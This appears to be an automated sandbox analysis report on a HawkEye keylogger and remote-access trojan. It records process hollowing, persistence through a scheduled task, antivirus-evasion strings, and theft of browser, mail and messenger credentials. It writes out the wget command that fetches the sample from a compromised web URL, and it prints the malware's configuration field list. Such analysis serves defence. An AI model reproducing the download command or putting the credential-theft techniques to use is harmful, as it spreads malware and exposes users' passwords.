Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
.NET source code references suspicious native API functionsShow sources
Source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, u202d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeMemory written: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe base: 400000 value starts with: 4D5AJump to behavior
Sample uses process hollowing techniqueShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe' Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TPykFAdhwNOvb' /XML 'C:\Users\user\AppData\Local\Temp\tmpC925.tmp'Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exe C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeJump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpD3D3.tmp'Jump to behavior
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmpC597.tmp'Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://robotrade.com.vn/wp-content/images/views/qaxCr0UKyI0yfkE.exe' Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmpBinary or memory string: Progman
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2382192205.0000000001B50000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00418906 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,8_2_00418906
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeCode function: 4_2_00D2BCC2 GetUserNameW,4_2_00D2BCC2
Contains functionality to query windows versionShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00409218 GetVersionExW,8_2_00409218
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)Show sources
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: bdagent.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avguard.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avgrsx.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avcenter.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avp.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: zlclient.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avgcsrvx.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avgnt.exe
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1971366862.0000000000F6C000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: hijackthis.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avgui.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: avgwdsvc.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: mbam.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2383283615.00000000033A0000.00000004.00000001.sdmpBinary or memory string: ComboFix.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Users\user\Desktop\download\qaxCr0UKyI0yfkE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information:

barindex
Yara detected HawkEye KeyloggerShow sources
Source: Yara matchFile source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara matchFile source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.dbJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\places.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Tries to steal Instant Messenger accounts or passwordsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword12_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword12_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword12_2_004033B1
Yara detected WebBrowserPassView password recovery toolShow sources
Source: Yara matchFile source: 00000008.00000002.1978302785.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000003.1970485212.0000000004C13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.2381926430.00000000016F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.2384332415.0000000006EC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4780, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.qaxCr0UKyI0yfkE.exe.16f0000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Detected HawkEye RatShow sources
Source: qaxCr0UKyI0yfkE.exe, 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Source: qaxCr0UKyI0yfkE.exe, 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
Yara detected HawkEye KeyloggerShow sources
Source: Yara matchFile source: 00000007.00000002.2380483306.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1975285667.0000000004308000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.2383322507.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1973879650.0000000003FF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 1516, type: MEMORY
Source: Yara matchFile source: Process Memory Space: qaxCr0UKyI0yfkE.exe PID: 4296, type: MEMORY
Source: Yara matchFile source: 7.2.qaxCr0UKyI0yfkE.exe.400000.0.unpack, type: UNPACKEDPE

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet